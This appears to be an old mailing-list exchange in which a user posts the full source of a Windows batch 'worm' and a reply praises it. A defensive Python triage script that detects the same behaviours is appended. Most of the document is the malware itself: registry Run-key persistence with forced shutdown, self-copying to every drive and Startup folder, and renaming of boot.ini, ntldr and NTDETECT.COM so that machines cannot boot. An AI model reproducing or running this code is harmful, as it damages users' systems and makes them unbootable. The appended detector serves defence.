Anatomy of a worm written with plain Windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created an MS-DOS .bat file using Notepad and then converted the shezan.bat file to .exe using a bat2exe software. It's nothing. I just cobbled it together somehow… Check the source code…
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you’ve found a great security hole Windows has. It's a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. it's nothing near to a virus. It's just malware. A virus needs lots of capability to be called a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called a worm.
Antiviruses detect it as those test in heuristic mode…
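
A defender-side triage sketch, added here and not part of the original post or e-mail: it statically flags the behaviours visible in the batch file above (Run-key persistence, Startup-folder and drive-root copies, boot-file unhide and rename, clock change), expanding %VAR% references set earlier in the script. The rule names, function names and the shortened sample excerpt are assumptions made for illustration.

```python
import re

# Triage rules (names are illustrative) for the behaviours in the quoted batch file.
BOOT = r"\\(?:boot\.ini|ntldr|ntdetect\.com)\b"
RULES = {
    "clock_change": re.compile(r"^\s*(?:date|time)\s+\d", re.I),
    "run_key_persistence": re.compile(
        r"^\s*reg\s+add\b.*\\CurrentVersion\\Run(?:Once)?\b", re.I),
    "drive_root_copy": re.compile(r"^\s*copy\s+\S+\s+[a-z]:\\?\s*$", re.I),
    "startup_folder_drop": re.compile(
        r"^\s*copy\b.*\\Start Menu\\Programs\\Startup", re.I),
    "boot_file_unhide": re.compile(r"^\s*attrib\b.*-[hs]\b.*" + BOOT, re.I),
    "boot_file_rename": re.compile(r"^\s*ren(?:ame)?\s+\S*" + BOOT, re.I),
}
SET_RE = re.compile(r"^\s*set\s+(\w+)=(.*)$", re.I)

def expand(line, env):
    """Substitute %VAR% with values from earlier SET lines; unknown names stay as-is."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), line)

def triage(script):
    """Return {rule name: [1-based line numbers]} for every rule that fired."""
    env, hits = {}, {name: [] for name in RULES}
    for lineno, raw in enumerate(script.splitlines(), 1):
        m = SET_RE.match(raw)
        if m:  # remember the variable so "REG ADD %KEY%" can be resolved later
            env[m.group(1).upper()] = m.group(2).strip()
            continue
        line = expand(raw, env)
        for name, rx in RULES.items():
            if rx.search(line):
                hits[name].append(lineno)
    return {name: lines for name, lines in hits.items() if lines}

def persists_and_tampers(hits):
    """High-priority verdict: autostart persistence together with boot-file renames."""
    persists = "run_key_persistence" in hits or "startup_folder_drop" in hits
    return persists and "boot_file_rename" in hits

# Shortened excerpt of the script quoted above (sample input, not the full file).
SAMPLE = r'''@echo off
date 12-16-2020 | time 16:00:47.47
SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f
copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini
ren c:\ntldr shezanldr
'''

if __name__ == "__main__":
    for rule, lines in triage(SAMPLE).items():
        print(f"{rule}: lines {lines}")
```

The Run-key rule only fires because of the variable expansion step; matching `REG ADD %KEY%` literally would miss it.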
